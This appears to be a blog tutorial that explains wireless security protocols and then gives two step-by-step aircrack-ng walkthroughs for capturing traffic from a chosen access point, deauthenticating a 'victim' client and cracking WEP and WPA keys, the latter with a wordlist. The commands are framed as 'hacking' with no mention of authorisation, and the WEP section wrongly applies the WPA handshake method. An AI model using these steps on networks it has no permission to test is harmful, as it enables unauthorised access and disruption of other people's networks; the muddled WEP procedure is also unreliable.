HOW TO HACK PASSWORDS FROM Wi-Fi USING WEP AND WPA

What is Wireless?

The word wireless is dictionary defined as “having no wires“. In networking terminology, wireless is the term used to describe any computer network where there is no physical wired connection between sender and receiver, but rather the network is connected by radio waves and/or microwaves to maintain communications. Wireless networking utilizes specific equipment such as NICs, APs and routers in place of wires (copper or optical-fibre) for connectivity.

Wireless technology started in the early 20th century with radiotelegraphy using Morse code. When the process of modulation was introduced, it became possible to transmit voices, music and other sounds wirelessly. This medium then came to be known as radio. Due to the demand of data communication, the need for a larger portion of the spectrum of wireless signals became a requirement and the term wireless gained widespread use.

When the word wireless is mentioned, people most often mean wireless computer networking as in Wi-Fi or cellular telephony, which is the backbone of personal communications.

Common everyday wireless technologies include:

  • 802.11 Wi-Fi: Wireless networking technology for personal computers
  • Bluetooth: Technology for interconnecting small devices
  • Global System for Mobile Communication (GSM): De facto mobile phone standard in many countries
  • Two-Way Radio: Radio communications, as in amateur and citizen band radio services, as well as business and military communications

What is Penetration Testing?

A penetration test, also known as a pen test, is a simulated cyberattack against your computer system to check for exploitable vulnerabilities. In the context of web application security, penetration testing is commonly used to augment a web application firewall.

Pen testing can involve the attempted breaching of any number of application systems, (e.g., application protocol interfaces (APIs), frontend/backend servers) to uncover vulnerabilities, such as un-sanitized inputs that are susceptible to code injection attacks.

Insights provided by the penetration test can be used to fine-tune your WAF security policies and patch detected vulnerabilities.

Phases of Penetration Testing?

Penetration Testing Phases

What is Wireless Penetration Testing?

Wireless Penetration testing is the Actively Examine the Process of Information security Measures which is Placed in Wireless Networks and also analyses the Weakness, technical flows, and Critical wireless Vulnerabilities.

Most important counter Measures we should focus on Threat Assessment, Data theft Detection, security control auditing, Risk prevention and Detection, information system Management, Upgrade infrastructure and the Detailed report should be prepared

WEP (Wired Equivalent Privacy)

WEP:

Wired Equivalent Privacy (WEP) is a security protocol, specified in the IEEE Wireless Fidelity (Wi-Fi) standard, 802.11b, that is designed to provide a wireless local area network (WLAN) with a level of security and privacy comparable to what is usually expected of a wired LAN. A wired local area network (LAN) is generally protected by physical security mechanisms (controlled access to a building, for example) that are effective for a controlled physical environment, but may be ineffective for WLANs because radio waves are not necessarily bound by the walls containing the network. WEP seeks to establish similar protection to that offered by the wired network’s physical security measures by encrypting data transmitted over the WLAN. Data encryption protects the vulnerable wireless link between clients and access points; once this measure has been taken, other typical LAN security mechanisms such as password protection, end-to-end encryption, virtual private networks (VPNs), and authentication can be put in place to ensure privacy.

Step 1: Check Wireless adapter connected with system

Open a terminal and type the following command and hit enter as shown in the figure below.

#iwconfig

Step 2: Setting Up adapter in monitor mode

Open a terminal and type the following command and hit enter as shown in the figure below.

#airmon-ng start wlan0

Airmon-ng start wlan0

Step 3: Searching for Access Points around you

Open a terminal and type the following command and hit enter as shown in the figure below.

#airodump-ng wlan0mon

Airodump-ng

Step 4: Capturing Packets of selected access point

Now let’s capture packets of the WIFI that we want to hack. Type the following command to do so.

# airodump-ng –bssid 7C:8B:CA:46:B2:F9 -c 4 -w my1 wlan0mon

Airodump-ng for Particular SSID

after that my1-01.cap file is stored.

Step 5: Deauth. Packets Request for handshaking

Open a terminal and type the following command and hit enter as shown in the figure below.

#aireplay-ng -0 0 -a 7C:8B:CA:46:B2:F9 wlan0mon

Aireplay-ng

After 2 or 3 minutes close it for reauth. victim

Step 6: Cracking the Password using aircrack-ng

Open a terminal and type the following command and hit enter as shown in the figure below.

#aircrack-ng ‘/root/Desktop/my1-01.cap’

Aircrack-ng

We have successfully cracked the password.

WPA (Wi-Fi Protected Access)

WPA (Wi-Fi Protected Access)

Wi-Fi Protected Access (WPA), Wi-Fi Protected Access II (WPA2), and Wi-Fi Protected Access 3 (WPA3) are three security protocols and security certification programs developed by the Wi-Fi Alliance to secure wireless computer networks. The Alliance defined these in response to serious weaknesses researchers had found in the previous system, Wired Equivalent Privacy (WEP).

Difference between WPA, WPA2, WPA3

WPA

The Wi-Fi Alliance intended WPA as an intermediate measure to take the place of WEP pending the availability of the full IEEE 802.11i standard. WPA could be implemented through firmware upgrades on wireless network interface cards designed for WEP that began shipping as far back as 1999. However, since the changes required in the wireless access points (APs) were more extensive than those needed on the network cards, most pre-2003 APs could not be upgraded to support WPA.

The WPA protocol implements much of the IEEE 802.11i standard. Specifically, the Temporal Key Integrity Protocol (TKIP) was adopted for WPA. WEP used a 64-bit or 128-bit encryption key that must be manually entered on wireless access points and devices and does not change. TKIP employs a per-packet key, meaning that it dynamically generates a new 128-bit key for each packet and thus prevents the types of attacks that compromised WEP.

WPA2

WPA2 replaced WPA. WPA2, which requires testing and certification by the Wi-Fi Alliance, implements the mandatory elements of IEEE 802.11i. In particular, it includes mandatory support for CCMP, an AES-based encryption mode. Certification began in September, 2004; from March 13, 2006, WPA2 certification is mandatory for all new devices to bear the Wi-Fi trademark.

WPA3

In January 2018, the Wi-Fi Alliance announced WPA3 as a replacement to WPA2. The new standard uses 128-bit encryption in WPA3-Personal mode (192-bit in WPA3-Enterprise) and forward secrecy. The WPA3 standard also replaces the Pre-Shared Key exchange with Simultaneous Authentication of Equals as defined in IEEE 802.11-2016 resulting in a more secure initial key exchange in personal mode. The Wi-Fi Alliance also claims that WPA3 will mitigate security issues posed by weak passwords and simplify the process of setting up devices with no display interface.

Step 1: Check Wireless adapter connected with system

Open a terminal and type the following command and hit enter as shown in the figure below.

#iwconfig

iwconfig

Step 2: Setting Up adapter in monitor mode

Open a terminal and type the following command and hit enter as shown in the figure below.

#airmon-ng start wlan0

airmon-ng

Step 3: Searching for Access Points around you

Open a terminal and type the following command and hit enter as shown in the figure below.

#airodump-ng wlan0mon

airodump-ng

Select the target and copy BSSID of target.

Step 4: Capturing Packets of selected access point

Now let’s capture packets of the WIFI that we want to hack. Type the following command to do so.

# airodump-ng –bssid 7C:8B:CA:46:B2:F9 -c 4 -w my1 wlan0mon

airodump-ng

after that my1-01.cap file is stored.

.cap File

Step 5: Deauth. Packets Request for handshaking

Open a terminal and type the following command and hit enter as shown in the figure below.

#aireplay-ng -0 0 -a 7C:8B:CA:46:B2:F9 wlan0mon

aireplay-ng

After 2 or 3 minutes close it for reconnect to victim

 Step 6: Cracking the Password using aircrack-ng

Use aircrack along with a dictionary wordlist to crack the password.

Dictionary for the Attack

Open a terminal and type the following command and hit enter as shown in the figure below.

#aircrack-ng -w ‘/root/Desktop/wordlist’ ‘/root/Desktop/my1-01.cap’

We have successfully cracked the password.

HOW TO HACK PASSWORDS FROM Wi-Fi USING WEP AND WPA

Leave a Reply

Your email address will not be published. Required fields are marked *

Scroll to top